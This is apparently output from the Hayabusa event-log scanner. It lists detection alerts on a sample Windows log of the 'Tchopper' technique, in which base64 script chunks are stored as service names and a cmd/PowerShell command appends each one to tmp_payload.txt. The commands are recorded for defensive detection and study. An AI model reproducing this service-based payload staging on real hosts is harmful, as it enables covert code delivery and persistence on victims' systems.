+2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
